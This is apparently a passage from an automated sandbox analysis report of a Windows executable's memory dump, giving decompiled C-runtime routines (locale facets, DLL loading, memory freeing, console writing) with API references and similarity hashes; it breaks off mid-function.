                                                                                                0x00f790fd
                                                                                                0x00f79101
                                                                                                0x00f79103
                                                                                                0x00f79182
                                                                                                0x00f79182
                                                                                                0x00f79105
                                                                                                0x00f79108
                                                                                                0x00f7910b
                                                                                                0x00f7910d
                                                                                                0x00f7911b
                                                                                                0x00f7910f
                                                                                                0x00f7910f
                                                                                                0x00f79112
                                                                                                0x00f79114
                                                                                                0x00f79116
                                                                                                0x00f79116
                                                                                                0x00f79114
                                                                                                0x00f79124
                                                                                                0x00f79129
                                                                                                0x00f79132
                                                                                                0x00f79135
                                                                                                0x00f7913b
                                                                                                0x00f79142
                                                                                                0x00f79148
                                                                                                0x00f7914f
                                                                                                0x00f79156
                                                                                                0x00f7915c
                                                                                                0x00f79167
                                                                                                0x00f7916d
                                                                                                0x00f79172
                                                                                                0x00f79175
                                                                                                0x00f79178
                                                                                                0x00f7917c
                                                                                                0x00f7917c
                                                                                                0x00f79184
                                                                                                0x00f7918b
                                                                                                0x00f7918e
                                                                                                0x00f79190
                                                                                                0x00f79192
                                                                                                0x00f79192
                                                                                                0x00f79198
                                                                                                0x00f7919b
                                                                                                0x00f7919b
                                                                                                0x00f791a0
                                                                                                0x00f791a3
                                                                                                0x00f791a8
                                                                                                0x00f791b4
                                                                                                0x00f791b7
                                                                                                0x00f791bd
                                                                                                0x00f791c4
                                                                                                0x00f790e7
                                                                                                0x00f790e7
                                                                                                0x00f790e7
                                                                                                0x00000000
                                                                                                0x00f790e5
                                                                                                0x00f790c8
                                                                                                0x00f790d0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f790d5
                                                                                                0x00000000
                                                                                                0x00f790d5
                                                                                                0x00f790b8

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F79050
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F79072
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F7909A
                                                                                                • LocalAlloc.KERNEL32(00000040,00000018,00000000,FD8FA683,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00F790F2
                                                                                                • __Getctype.LIBCPMT ref: 00F7916D
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F791A8
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F791D2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                • String ID:
                                                                                                • API String ID: 2372200979-0
                                                                                                • Opcode ID: 3aeb4956a326ffca91941781d8fb7b131f28b1580e00f76ef632edbd841f1f82
                                                                                                • Instruction ID: b03de6a7149477823387c79d5e8de15bfab3b04ac7ab8e61a19225a653eea41e
                                                                                                • Opcode Fuzzy Hash: 3aeb4956a326ffca91941781d8fb7b131f28b1580e00f76ef632edbd841f1f82
                                                                                                • Instruction Fuzzy Hash: 7E51D371D05609DFDB11DF68C844BDEBBF4EF04710F14815AE449AB382DBB4AA05EB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00FA76E7(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                                                                				signed int* _v8;
                                                                                                				void** _t12;
                                                                                                				void* _t16;
                                                                                                				void* _t18;
                                                                                                				signed int _t22;
                                                                                                				WCHAR* _t23;
                                                                                                				void** _t26;
                                                                                                				signed int* _t29;
                                                                                                				void* _t32;
                                                                                                				void* _t34;
                                                                                                
                                                                                                				_t29 = _a4;
                                                                                                				while(_t29 != _a8) {
                                                                                                					_t22 =  *_t29;
                                                                                                					_t12 = 0xfd12e0 + _t22 * 4;
                                                                                                					_t32 =  *_t12;
                                                                                                					_v8 = _t12;
                                                                                                					if(_t32 == 0) {
                                                                                                						_t23 =  *(0xfbd530 + _t22 * 4);
                                                                                                						_t32 = LoadLibraryExW(_t23, 0, 0x800);
                                                                                                						if(_t32 != 0) {
                                                                                                							L12:
                                                                                                							_t26 = _v8;
                                                                                                							 *_t26 = _t32;
                                                                                                							if( *_t26 != 0) {
                                                                                                								FreeLibrary(_t32);
                                                                                                							}
                                                                                                							L14:
                                                                                                							if(_t32 != 0) {
                                                                                                								_t16 = _t32;
                                                                                                								L18:
                                                                                                								return _t16;
                                                                                                							}
                                                                                                							L15:
                                                                                                							_t29 =  &(_t29[1]);
                                                                                                							continue;
                                                                                                						}
                                                                                                						_t18 = GetLastError();
                                                                                                						if(_t18 != 0x57) {
                                                                                                							L9:
                                                                                                							_t32 = 0;
                                                                                                							L10:
                                                                                                							if(_t32 != 0) {
                                                                                                								goto L12;
                                                                                                							}
                                                                                                							 *_v8 = _t18 | 0xffffffff;
                                                                                                							goto L15;
                                                                                                						}
                                                                                                						_t18 = E00F9BE48(_t23, L"api-ms-", 7);
                                                                                                						_t34 = _t34 + 0xc;
                                                                                                						if(_t18 == 0) {
                                                                                                							goto L9;
                                                                                                						}
                                                                                                						_t18 = E00F9BE48(_t23, L"ext-ms-", 7);
                                                                                                						_t34 = _t34 + 0xc;
                                                                                                						if(_t18 == 0) {
                                                                                                							goto L9;
                                                                                                						}
                                                                                                						_t18 = LoadLibraryExW(_t23, _t32, _t32);
                                                                                                						_t32 = _t18;
                                                                                                						goto L10;
                                                                                                					}
                                                                                                					if(_t32 == 0xffffffff) {
                                                                                                						goto L15;
                                                                                                					}
                                                                                                					goto L14;
                                                                                                				}
                                                                                                				_t16 = 0;
                                                                                                				goto L18;
                                                                                                			}













                                                                                                0x00fa76f0
                                                                                                0x00fa779a
                                                                                                0x00fa76f8
                                                                                                0x00fa76fa
                                                                                                0x00fa7701
                                                                                                0x00fa7703
                                                                                                0x00fa7709
                                                                                                0x00fa7716
                                                                                                0x00fa772b
                                                                                                0x00fa772f
                                                                                                0x00fa7781
                                                                                                0x00fa7781
                                                                                                0x00fa7786
                                                                                                0x00fa778a
                                                                                                0x00fa778d
                                                                                                0x00fa778d
                                                                                                0x00fa7793
                                                                                                0x00fa7795
                                                                                                0x00fa77ac
                                                                                                0x00fa77a5
                                                                                                0x00fa77ab
                                                                                                0x00fa77ab
                                                                                                0x00fa7797
                                                                                                0x00fa7797
                                                                                                0x00000000
                                                                                                0x00fa7797
                                                                                                0x00fa7731
                                                                                                0x00fa773a
                                                                                                0x00fa7771
                                                                                                0x00fa7771
                                                                                                0x00fa7773
                                                                                                0x00fa7775
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa777d
                                                                                                0x00000000
                                                                                                0x00fa777d
                                                                                                0x00fa7744
                                                                                                0x00fa7749
                                                                                                0x00fa774e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa7758
                                                                                                0x00fa775d
                                                                                                0x00fa7762
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa7767
                                                                                                0x00fa776d
                                                                                                0x00000000
                                                                                                0x00fa776d
                                                                                                0x00fa770e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa7714
                                                                                                0x00fa77a3
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 0-537541572
                                                                                                • Opcode ID: 56d84edccf735609c61096a279b32619c97d4155ba61449bec8d92cc51c34c04
                                                                                                • Instruction ID: a8ce260208f8f766de18aa0ad0289e1063270710fd2e22763a893de479d801ff
                                                                                                • Opcode Fuzzy Hash: 56d84edccf735609c61096a279b32619c97d4155ba61449bec8d92cc51c34c04
                                                                                                • Instruction Fuzzy Hash: EB21DBB6E09315A7DB217B659C80F5A775C9B427F0F250520ED05A7290EA30DD01F6E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E00F8BB45(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				void* _t32;
                                                                                                				void* _t34;
                                                                                                				signed int _t38;
                                                                                                				signed int _t39;
                                                                                                				intOrPtr _t47;
                                                                                                				intOrPtr _t49;
                                                                                                				void* _t50;
                                                                                                				intOrPtr* _t51;
                                                                                                				intOrPtr _t52;
                                                                                                				signed int _t53;
                                                                                                				void* _t59;
                                                                                                				void* _t64;
                                                                                                				intOrPtr _t67;
                                                                                                				void* _t68;
                                                                                                				void* _t72;
                                                                                                
                                                                                                				_t72 = __eflags;
                                                                                                				_t52 = __ecx;
                                                                                                				_push(0x30);
                                                                                                				E00FB38B2(0xfb7745, __edi, __esi);
                                                                                                				_t49 = _t52;
                                                                                                				 *((intOrPtr*)(_t68 - 0x10)) = _t49;
                                                                                                				_t32 = E00F85A28(_t72, _t68 - 0x3c);
                                                                                                				_t50 = _t49 + 0x2c;
                                                                                                				_t53 = 0xb;
                                                                                                				memcpy(_t50, _t32, _t53 << 2);
                                                                                                				_t34 = E00FA1EE6(_t59);
                                                                                                				_t67 =  *((intOrPtr*)(_t68 - 0x10));
                                                                                                				_t64 = _t34;
                                                                                                				 *((intOrPtr*)(_t68 - 0x10)) = _t67;
                                                                                                				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                				 *((intOrPtr*)(_t67 + 0x10)) = 0;
                                                                                                				 *((intOrPtr*)(_t67 + 0x14)) = 0;
                                                                                                				 *((intOrPtr*)(_t67 + 0x18)) = 0;
                                                                                                				_push(_t50);
                                                                                                				_push(0);
                                                                                                				 *((intOrPtr*)(_t68 - 4)) = 0;
                                                                                                				 *((intOrPtr*)(_t67 + 8)) = E00F7F7A0( *((intOrPtr*)(_t64 + 0x1c)));
                                                                                                				E00F8B9E8(_t67, 0, _t64);
                                                                                                				if( *((char*)(_t67 + 0x28)) == 0) {
                                                                                                					_t38 =  *((intOrPtr*)(_t64 + 0x29));
                                                                                                				} else {
                                                                                                					_t38 =  *((intOrPtr*)(_t64 + 0x28));
                                                                                                				}
                                                                                                				_t39 = _t38;
                                                                                                				 *(_t67 + 0x1c) = _t39;
                                                                                                				if(_t39 < 0 || _t39 >= 0x7f) {
                                                                                                					 *(_t67 + 0x1c) =  *(_t67 + 0x1c) & 0x00000000;
                                                                                                				}
                                                                                                				_t20 = _t67 + 0x20; // 0x20
                                                                                                				_t51 = _t20;
                                                                                                				E00F8CB18(_t67, _t51,  *((char*)(_t64 + 0x2b)),  *((char*)(_t64 + 0x2a)),  *((char*)(_t64 + 0x2e)));
                                                                                                				_t24 = _t67 + 0x24; // 0x24
                                                                                                				_t47 = E00F8CB18(_t67, _t24,  *((char*)(_t64 + 0x2d)),  *((char*)(_t64 + 0x2c)),  *((char*)(_t64 + 0x2f)));
                                                                                                				if( *((char*)(_t68 + 0xc)) != 0) {
                                                                                                					_t47 = 0x76782b24;
                                                                                                					 *_t51 = 0x76782b24;
                                                                                                					 *((intOrPtr*)(_t67 + 0x24)) = 0x76782b24;
                                                                                                				}
                                                                                                				return E00FB388C(_t47);
                                                                                                			}


















                                                                                                0x00f8bb45
                                                                                                0x00f8bb45
                                                                                                0x00f8bb45
                                                                                                0x00f8bb4c
                                                                                                0x00f8bb51
                                                                                                0x00f8bb53
                                                                                                0x00f8bb5a
                                                                                                0x00f8bb5f
                                                                                                0x00f8bb66
                                                                                                0x00f8bb69
                                                                                                0x00f8bb6b
                                                                                                0x00f8bb70
                                                                                                0x00f8bb73
                                                                                                0x00f8bb77
                                                                                                0x00f8bb7a
                                                                                                0x00f8bb7d
                                                                                                0x00f8bb80
                                                                                                0x00f8bb83
                                                                                                0x00f8bb86
                                                                                                0x00f8bb87
                                                                                                0x00f8bb8b
                                                                                                0x00f8bb96
                                                                                                0x00f8bb9e
                                                                                                0x00f8bba7
                                                                                                0x00f8bbae
                                                                                                0x00f8bba9
                                                                                                0x00f8bba9
                                                                                                0x00f8bba9
                                                                                                0x00f8bbb1
                                                                                                0x00f8bbb4
                                                                                                0x00f8bbb9
                                                                                                0x00f8bbc0
                                                                                                0x00f8bbc0
                                                                                                0x00f8bbc8
                                                                                                0x00f8bbc8
                                                                                                0x00f8bbd9
                                                                                                0x00f8bbe2
                                                                                                0x00f8bbf3
                                                                                                0x00f8bbfc
                                                                                                0x00f8bbfe
                                                                                                0x00f8bc03
                                                                                                0x00f8bc05
                                                                                                0x00f8bc05
                                                                                                0x00f8bc0d

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Mpunct$GetcvtGetvalsH_prolog3
                                                                                                • String ID: $+xv
                                                                                                • API String ID: 2737107202-1686923651
                                                                                                • Opcode ID: 1c5d89813671cac5b00deb702224b5fada7a28ba640ac86ba3bbf684c1abffd2
                                                                                                • Instruction ID: 13e2a4dd2a40c4630654c20fcc9f5d66af5be6e8618bc77d27d8d26ec7860dd3
                                                                                                • Opcode Fuzzy Hash: 1c5d89813671cac5b00deb702224b5fada7a28ba640ac86ba3bbf684c1abffd2
                                                                                                • Instruction Fuzzy Hash: E521C4B1904B526ED725EF7588917BBBEF8BB0D310F04061AE499C7A42D734E601DBD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00FAB7E5(intOrPtr _a4) {
                                                                                                				void* _t18;
                                                                                                
                                                                                                				_t45 = _a4;
                                                                                                				if(_a4 != 0) {
                                                                                                					E00FAB52F(_t45, 7);
                                                                                                					E00FAB52F(_t45 + 0x1c, 7);
                                                                                                					E00FAB52F(_t45 + 0x38, 0xc);
                                                                                                					E00FAB52F(_t45 + 0x68, 0xc);
                                                                                                					E00FAB52F(_t45 + 0x98, 2);
                                                                                                					E00FA609F( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                                					E00FA609F( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                                					E00FA609F( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                                					E00FAB52F(_t45 + 0xb4, 7);
                                                                                                					E00FAB52F(_t45 + 0xd0, 7);
                                                                                                					E00FAB52F(_t45 + 0xec, 0xc);
                                                                                                					E00FAB52F(_t45 + 0x11c, 0xc);
                                                                                                					E00FAB52F(_t45 + 0x14c, 2);
                                                                                                					E00FA609F( *((intOrPtr*)(_t45 + 0x154)));
                                                                                                					E00FA609F( *((intOrPtr*)(_t45 + 0x158)));
                                                                                                					E00FA609F( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                                					return E00FA609F( *((intOrPtr*)(_t45 + 0x160)));
                                                                                                				}
                                                                                                				return _t18;
                                                                                                			}




                                                                                                0x00fab7eb
                                                                                                0x00fab7f0
                                                                                                0x00fab7f9
                                                                                                0x00fab804
                                                                                                0x00fab80f
                                                                                                0x00fab81a
                                                                                                0x00fab828
                                                                                                0x00fab833
                                                                                                0x00fab83e
                                                                                                0x00fab849
                                                                                                0x00fab857
                                                                                                0x00fab865
                                                                                                0x00fab876
                                                                                                0x00fab884
                                                                                                0x00fab892
                                                                                                0x00fab89d
                                                                                                0x00fab8a8
                                                                                                0x00fab8b3
                                                                                                0x00000000
                                                                                                0x00fab8c3
                                                                                                0x00fab8c8

                                                                                                APIs
                                                                                                  • Part of subcall function 00FAB52F: _free.LIBCMT ref: 00FAB554
                                                                                                • _free.LIBCMT ref: 00FAB833
                                                                                                  • Part of subcall function 00FA609F: HeapFree.KERNEL32(00000000,00000000,?,00FAB559,?,00000000,?,?,?,00FAB7FE,?,00000007,?,?,00FABD08,?), ref: 00FA60B5
                                                                                                  • Part of subcall function 00FA609F: GetLastError.KERNEL32(?,?,00FAB559,?,00000000,?,?,?,00FAB7FE,?,00000007,?,?,00FABD08,?,?), ref: 00FA60C7
                                                                                                • _free.LIBCMT ref: 00FAB83E
                                                                                                • _free.LIBCMT ref: 00FAB849
                                                                                                • _free.LIBCMT ref: 00FAB89D
                                                                                                • _free.LIBCMT ref: 00FAB8A8
                                                                                                • _free.LIBCMT ref: 00FAB8B3
                                                                                                • _free.LIBCMT ref: 00FAB8BE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: cc2ba8a86978be413db42c830bed86295f7267624158f265280c688662d45b36
                                                                                                • Instruction ID: b203974d7f1c662fb6d1022438ab4a3b8e9e3d5135de26a0d9d437ee9737a72b
                                                                                                • Opcode Fuzzy Hash: cc2ba8a86978be413db42c830bed86295f7267624158f265280c688662d45b36
                                                                                                • Instruction Fuzzy Hash: D2118EB2941B04BBD630BBB0DC07FDB779DAF06B00F484824B29DA6057EB3CB544AA50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 67%
                                                                                                			E00FB18B0(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
                                                                                                				signed int _v8;
                                                                                                				char _v16;
                                                                                                				char _v23;
                                                                                                				char _v24;
                                                                                                				void _v32;
                                                                                                				signed int _v33;
                                                                                                				long _v40;
                                                                                                				signed char _v44;
                                                                                                				char _v47;
                                                                                                				void _v48;
                                                                                                				intOrPtr _v52;
                                                                                                				long _v56;
                                                                                                				char _v60;
                                                                                                				intOrPtr _v68;
                                                                                                				char _v72;
                                                                                                				struct _OVERLAPPED* _v76;
                                                                                                				signed char _v80;
                                                                                                				signed char _v84;
                                                                                                				intOrPtr _v88;
                                                                                                				signed int _v92;
                                                                                                				long _v96;
                                                                                                				long _v100;
                                                                                                				intOrPtr _v104;
                                                                                                				intOrPtr _v108;
                                                                                                				signed char _v112;
                                                                                                				void* _v116;
                                                                                                				char _v120;
                                                                                                				int _v124;
                                                                                                				intOrPtr _v128;
                                                                                                				struct _OVERLAPPED* _v132;
                                                                                                				struct _OVERLAPPED* _v136;
                                                                                                				struct _OVERLAPPED* _v140;
                                                                                                				struct _OVERLAPPED* _v144;
                                                                                                				signed int _t172;
                                                                                                				signed int _t174;
                                                                                                				int _t178;
                                                                                                				intOrPtr _t183;
                                                                                                				intOrPtr _t186;
                                                                                                				void* _t188;
                                                                                                				void* _t190;
                                                                                                				long _t193;
                                                                                                				void _t198;
                                                                                                				long _t202;
                                                                                                				void* _t206;
                                                                                                				intOrPtr _t212;
                                                                                                				signed char* _t213;
                                                                                                				char _t216;
                                                                                                				signed int _t219;
                                                                                                				char* _t220;
                                                                                                				void* _t222;
                                                                                                				long _t228;
                                                                                                				intOrPtr _t229;
                                                                                                				char _t231;
                                                                                                				signed char _t235;
                                                                                                				struct _OVERLAPPED* _t243;
                                                                                                				signed int _t246;
                                                                                                				intOrPtr _t249;
                                                                                                				signed char _t252;
                                                                                                				signed int _t253;
                                                                                                				signed char _t255;
                                                                                                				struct _OVERLAPPED* _t256;
                                                                                                				intOrPtr _t258;
                                                                                                				void* _t262;
                                                                                                				signed char _t263;
                                                                                                				void* _t264;
                                                                                                				void* _t266;
                                                                                                				long _t269;
                                                                                                				signed int _t272;
                                                                                                				long _t273;
                                                                                                				struct _OVERLAPPED* _t274;
                                                                                                				signed int _t276;
                                                                                                				intOrPtr _t278;
                                                                                                				signed int _t280;
                                                                                                				signed int _t283;
                                                                                                				long _t284;
                                                                                                				long _t285;
                                                                                                				signed char _t286;
                                                                                                				intOrPtr _t287;
                                                                                                				signed int _t288;
                                                                                                				void* _t289;
                                                                                                				void* _t290;
                                                                                                
                                                                                                				_t172 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_v8 = _t172 ^ _t288;
                                                                                                				_t174 = _a8;
                                                                                                				_t263 = _a12;
                                                                                                				_t276 = (_t174 & 0x0000003f) * 0x38;
                                                                                                				_t246 = _t174 >> 6;
                                                                                                				_v112 = _t263;
                                                                                                				_v84 = _t246;
                                                                                                				_v80 = _t276;
                                                                                                				_t278 = _a16 + _t263;
                                                                                                				_v116 =  *((intOrPtr*)(_t276 +  *((intOrPtr*)(0xfd10d8 + _t246 * 4)) + 0x18));
                                                                                                				_v104 = _t278;
                                                                                                				_t178 = GetConsoleCP();
                                                                                                				_t243 = 0;
                                                                                                				_v124 = _t178;
                                                                                                				E00F98DED( &_v72, _t263, 0);
                                                                                                				asm("stosd");
                                                                                                				_t249 =  *((intOrPtr*)(_v68 + 8));
                                                                                                				_v128 = _t249;
                                                                                                				asm("stosd");
                                                                                                				asm("stosd");
                                                                                                				_t269 = _v112;
                                                                                                				_v40 = _t269;
                                                                                                				if(_t269 >= _t278) {
                                                                                                					L52:
                                                                                                					__eflags = _v60 - _t243;
                                                                                                				} else {
                                                                                                					_t280 = _v92;
                                                                                                					while(1) {
                                                                                                						_v47 =  *_t269;
                                                                                                						_v76 = _t243;
                                                                                                						_v44 = 1;
                                                                                                						_t186 =  *((intOrPtr*)(0xfd10d8 + _v84 * 4));
                                                                                                						_v52 = _t186;
                                                                                                						if(_t249 != 0xfde9) {
                                                                                                							goto L23;
                                                                                                						}
                                                                                                						_t263 = _v80;
                                                                                                						_t212 = _t186 + 0x2e + _t263;
                                                                                                						_t256 = _t243;
                                                                                                						_v108 = _t212;
                                                                                                						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
                                                                                                							_t256 =  &(_t256->Internal);
                                                                                                							if(_t256 < 5) {
                                                                                                								continue;
                                                                                                							}
                                                                                                							break;
                                                                                                						}
                                                                                                						_t213 = _v40;
                                                                                                						_t272 = _v104 - _t213;
                                                                                                						_v44 = _t256;
                                                                                                						if(_t256 <= 0) {
                                                                                                							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0xfcf820)) + 1;
                                                                                                							_v52 = _t258;
                                                                                                							__eflags = _t258 - _t272;
                                                                                                							if(_t258 > _t272) {
                                                                                                								__eflags = _t272;
                                                                                                								if(_t272 <= 0) {
                                                                                                									goto L44;
                                                                                                								} else {
                                                                                                									_t284 = _v40;
                                                                                                									do {
                                                                                                										_t264 = _t243 + _t263;
                                                                                                										_t216 =  *((intOrPtr*)(_t243 + _t284));
                                                                                                										_t243 =  &(_t243->Internal);
                                                                                                										 *((char*)(_t264 +  *((intOrPtr*)(0xfd10d8 + _v84 * 4)) + 0x2e)) = _t216;
                                                                                                										_t263 = _v80;
                                                                                                										__eflags = _t243 - _t272;
                                                                                                									} while (_t243 < _t272);
                                                                                                									goto L43;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t273 = _v40;
                                                                                                								__eflags = _t258 - 4;
                                                                                                								_v144 = _t243;
                                                                                                								_t260 =  &_v144;
                                                                                                								_v140 = _t243;
                                                                                                								_v56 = _t273;
                                                                                                								_t219 = (0 | _t258 == 0x00000004) + 1;
                                                                                                								__eflags = _t219;
                                                                                                								_push( &_v144);
                                                                                                								_v44 = _t219;
                                                                                                								_push(_t219);
                                                                                                								_t220 =  &_v56;
                                                                                                								goto L21;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t228 =  *((char*)(( *(_t263 + _v52 + 0x2e) & 0x000000ff) + 0xfcf820)) + 1;
                                                                                                							_v56 = _t228;
                                                                                                							_t229 = _t228 - _t256;
                                                                                                							_v52 = _t229;
                                                                                                							if(_t229 > _t272) {
                                                                                                								__eflags = _t272;
                                                                                                								if(_t272 > 0) {
                                                                                                									_t285 = _v40;
                                                                                                									do {
                                                                                                										_t266 = _t243 + _t263 + _t256;
                                                                                                										_t231 =  *((intOrPtr*)(_t243 + _t285));
                                                                                                										_t243 =  &(_t243->Internal);
                                                                                                										 *((char*)(_t266 +  *((intOrPtr*)(0xfd10d8 + _v84 * 4)) + 0x2e)) = _t231;
                                                                                                										_t256 = _v44;
                                                                                                										_t263 = _v80;
                                                                                                										__eflags = _t243 - _t272;
                                                                                                									} while (_t243 < _t272);
                                                                                                									L43:
                                                                                                									_t280 = _v92;
                                                                                                								}
                                                                                                								L44:
                                                                                                								_t283 = _t280 + _t272;
                                                                                                								__eflags = _t283;
                                                                                                								L45:
                                                                                                								__eflags = _v60;
                                                                                                								_v92 = _t283;
                                                                                                							} else {
                                                                                                								_t263 = _t243;
                                                                                                								if(_t256 > 0) {
                                                                                                									_t287 = _v108;
                                                                                                									do {
                                                                                                										 *((char*)(_t288 + _t263 - 0xc)) =  *((intOrPtr*)(_t287 + _t263));
                                                                                                										_t263 = _t263 + 1;
                                                                                                									} while (_t263 < _t256);
                                                                                                									_t229 = _v52;
                                                                                                								}
                                                                                                								_t273 = _v40;
                                                                                                								if(_t229 > 0) {
                                                                                                									E00F96240( &_v16 + _t256, _t273, _v52);
                                                                                                									_t256 = _v44;
                                                                                                									_t289 = _t289 + 0xc;
                                                                                                								}
                                                                                                								if(_t256 > 0) {
                                                                                                									_t263 = _v44;
                                                                                                									_t274 = _t243;
                                                                                                									_t286 = _v80;
                                                                                                									do {
                                                                                                										_t262 = _t274 + _t286;
                                                                                                										_t274 =  &(_t274->Internal);
                                                                                                										 *(_t262 +  *((intOrPtr*)(0xfd10d8 + _v84 * 4)) + 0x2e) = _t243;
                                                                                                									} while (_t274 < _t263);
                                                                                                									_t273 = _v40;
                                                                                                								}
                                                                                                								_v136 = _t243;
                                                                                                								_v120 =  &_v16;
                                                                                                								_t260 =  &_v136;
                                                                                                								_v132 = _t243;
                                                                                                								_push( &_v136);
                                                                                                								_t235 = (0 | _v56 == 0x00000004) + 1;
                                                                                                								_v44 = _t235;
                                                                                                								_push(_t235);
                                                                                                								_t220 =  &_v120;
                                                                                                								L21:
                                                                                                								_push(_t220);
                                                                                                								_push( &_v76);
                                                                                                								_t222 = E00FAF052(_t260);
                                                                                                								_t290 = _t289 + 0x10;
                                                                                                								if(_t222 == 0xffffffff) {
                                                                                                									goto L52;
                                                                                                								} else {
                                                                                                									_t269 = _t273 + _v52 - 1;
                                                                                                									L31:
                                                                                                									_t269 = _t269 + 1;
                                                                                                									_v40 = _t269;
                                                                                                									_t193 = E00FA9E48(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
                                                                                                									_t289 = _t290 + 0x20;
                                                                                                									_v56 = _t193;
                                                                                                									if(_t193 == 0) {
                                                                                                										goto L52;
                                                                                                									} else {
                                                                                                										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
                                                                                                											L51:
                                                                                                											_v96 = GetLastError();
                                                                                                											goto L52;
                                                                                                										} else {
                                                                                                											_t280 = _v88 - _v112 + _t269;
                                                                                                											_v92 = _t280;
                                                                                                											if(_v100 < _v56) {
                                                                                                												goto L52;
                                                                                                											} else {
                                                                                                												if(_v47 != 0xa) {
                                                                                                													L38:
                                                                                                													if(_t269 >= _v104) {
                                                                                                														goto L52;
                                                                                                													} else {
                                                                                                														_t249 = _v128;
                                                                                                														continue;
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t198 = 0xd;
                                                                                                													_v48 = _t198;
                                                                                                													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
                                                                                                														goto L51;
                                                                                                													} else {
                                                                                                														if(_v100 < 1) {
                                                                                                															goto L52;
                                                                                                														} else {
                                                                                                															_v88 = _v88 + 1;
                                                                                                															_t280 = _t280 + 1;
                                                                                                															_v92 = _t280;
                                                                                                															goto L38;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						goto L53;
                                                                                                						L23:
                                                                                                						_t252 = _v80;
                                                                                                						_t263 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
                                                                                                						__eflags = _t263 & 0x00000004;
                                                                                                						if((_t263 & 0x00000004) == 0) {
                                                                                                							_v33 =  *_t269;
                                                                                                							_t188 = E00FA4C80(_t263);
                                                                                                							_t253 = _v33 & 0x000000ff;
